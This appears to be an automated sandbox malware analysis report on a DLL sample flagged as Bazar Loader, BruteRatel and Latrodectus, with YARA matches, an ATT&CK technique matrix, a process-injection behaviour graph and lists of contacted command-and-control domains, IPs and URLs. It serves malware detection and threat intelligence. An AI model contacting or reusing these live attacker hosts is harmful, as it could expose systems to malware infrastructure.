                  Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe
                  Source: C:\Windows\System32\rundll32.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 BlobJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Bazar Loader
                  Source: Yara matchFile source: 23.2.rundll32.exe.29f3b750000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.rundll32.exe.29f3b6b0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.rundll32.exe.29f3b750000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected BruteRatel
                  Source: Yara matchFile source: 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Source: Yara matchFile source: 00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Latrodectus
                  Source: Yara matchFile source: 0000001E.00000002.2587836163.0000000008AAC000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3504, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Bazar Loader
                  Source: Yara matchFile source: 23.2.rundll32.exe.29f3b750000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.rundll32.exe.29f3b6b0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.rundll32.exe.29f3b750000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected BruteRatel
                  Source: Yara matchFile source: 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Source: Yara matchFile source: 00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Latrodectus
                  Source: Yara matchFile source: 0000001E.00000002.2587836163.0000000008AAC000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3504, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		912
                  Process Injection                  		1
                  Disable or Modify Tools                  		21
                  Input Capture                  		1
                  System Time Discovery                  		Remote Services21
                  Input Capture                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		21
                  Virtualization/Sandbox Evasion                  		LSASS Memory41
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		11
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)912
                  Process Injection                  		Security Account Manager21
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information                  		NTDS2
                  Process Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeylogging113
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Rundll32                  		Cached Domain Credentials1
                  Account Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync1
                  System Owner/User Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  System Network Configuration Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
                  File and Directory Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing13
                  System Information Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525190 Sample: vierm_soft_x64.dll.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 39 tiguanin.com 2->39 41 isomicrotich.com 2->41 43 2 other IPs or domains 2->43 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Yara detected Latrodectus 2->55 57 7 other signatures 2->57 9 loaddll64.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 12 9->11         started        15 rundll32.exe 9->15         started        17 cmd.exe 1 9->17         started        19 7 other processes 9->19 dnsIp6 47 greshunka.com 82.115.223.39, 49722, 49727, 49728 MIDNET-ASTK-TelecomRU Russian Federation 11->47 49 bazarunet.com 80.78.24.30, 49718, 49719, 49720 CYBERDYNELR Cyprus 11->49 61 System process connects to network (likely due to code injection or exploit) 11->61 63 Injects code into the Windows Explorer (explorer.exe) 11->63 65 Sets debug register (to hijack the execution of another thread) 11->65 69 5 other signatures 11->69 21 explorer.exe 11->21 injected 67 Contains functionality to inject threads in other processes 15->67 25 WerFault.exe 18 15->25         started        27 rundll32.exe 17->27         started        29 WerFault.exe 16 19->29         started        31 WerFault.exe 3 16 19->31         started        33 WerFault.exe 16 19->33         started        35 WerFault.exe 19->35         started        signatures7 process8 dnsIp9 45 isomicrotich.com 188.114.96.3, 443, 49773, 49774 CLOUDFLARENETUS European Union 21->45 59 System process connects to network (likely due to code injection or exploit) 21->59 37 WerFault.exe 20 16 27->37         started        signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  vierm_soft_x64.dll.dll8%ReversingLabs

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                  https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                  https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                  https://excel.office.com0%URL Reputationsafe
                  https://word.office.com0%URL Reputationsafe
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                  https://outlook.com0%URL Reputationsafe
                  https://android.notify.windows.com/iOS0%URL Reputationsafe
                  http://schemas.micro0%URL Reputationsafe
                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                  http://x1.c.lencr.org/00%URL Reputationsafe
                  http://x1.i.lencr.org/00%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  isomicrotich.com
                  		188.114.96.3
                  		truetrue
                    		unknown
                    greshunka.com
                    		82.115.223.39
                    		truetrue
                      		unknown
                      tiguanin.com
                      		80.78.24.30
                      		truetrue
                        		unknown
                        bazarunet.com
                        		80.78.24.30
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://isomicrotich.com/test/true
                            		unknown
                            https://opewolumeras.com/test/true
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://isomicrotich.com/test/aexplorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmpfalse
                                		unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://greshunka.com:8041/bazar.php.rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://wns.windows.com/batexplorer.exe, 0000001E.00000000.1578935505.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.2292493778.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.000000000899E000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://www.stacker.com/arizona/phoenixexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2579681350.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://isomicrotich.com/explorer.exe, 0000001E.00000002.2591885032.000000000BEC0000.00000004.00000001.00020000.00000000.sdmptrue
                                        		unknown
                                        https://tiguanin.com:8041/admin.phpNrundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://tiguanin.com:8041/net.com:8041/rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://bazarunet.com:8041/bazar.phpmrundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://bazarunet.com:8041/net.com:8041/bazar.phprundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 0000001E.00000000.1578935505.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_deexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://excel.office.comexplorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://isomicrotich.com/test/Texplorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://tiguanin.com:8041/admin.phpWrundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(explorer.exe, 0000001E.00000003.2291414903.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BD22000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://tiguanin.com:8041/bazar.phprundll32.exe, 00000017.00000002.2575784572.0000029F39CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://isomicrotich.com/test/onsexplorer.exe, 0000001E.00000002.2591885032.000000000C16F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://bazarunet.com:8041/bazar.phpVrundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://tiguanin.com:8041/admin.phpterundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://bazarunet.com:8041/prundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://android.notify.windows.com/iOSpexplorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&ocexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://greshunka.com:8041/admin.phpnrundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-oexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://api.msn.com/rTexplorer.exe, 0000001E.00000000.1578935505.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://greshunka.com:8041/admin.phpadrundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://greshunka.com:8041/admin.phporundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000001E.00000003.2291036902.00000000085E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578828781.00000000085D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://isomicrotich.com/test/&explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://word.office.comexplorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://greshunka.com:8041/net.com:8041/0rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://tiguanin.com:8041/in.com:8041/bazar.phprundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://r10.o.lencr.org0#rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731677122.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848849900.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1574607542.0000029F3B856000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644516828.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644479966.0000029F3B858000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848954010.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2366245082.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029246377.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218239826.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218316136.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731411754.0000029F3BE0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://android.notify.windows.com/iOSJMexplorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://outlook.comexplorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://greshunka.com:8041/bazar.phprundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://bazarunet.com:8041/bazar.phprundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://isomicrotich.com/test/Hexplorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://tiguanin.com:8041/in.com:8041/rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://android.notify.windows.com/iOSZMexplorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://android.notify.windows.com/iOSexplorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://www.yelp.comexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://tiguanin.com:8041/prundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://greshunka.com:8041/rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://bazarunet.com:8041/%rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://tiguanin.com/zirundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://r10.i.lencr.org/0rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731677122.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848849900.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1574607542.0000029F3B856000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644516828.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644479966.0000029F3B858000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848954010.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2366245082.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029246377.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218239826.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218316136.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731411754.0000029F3BE0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
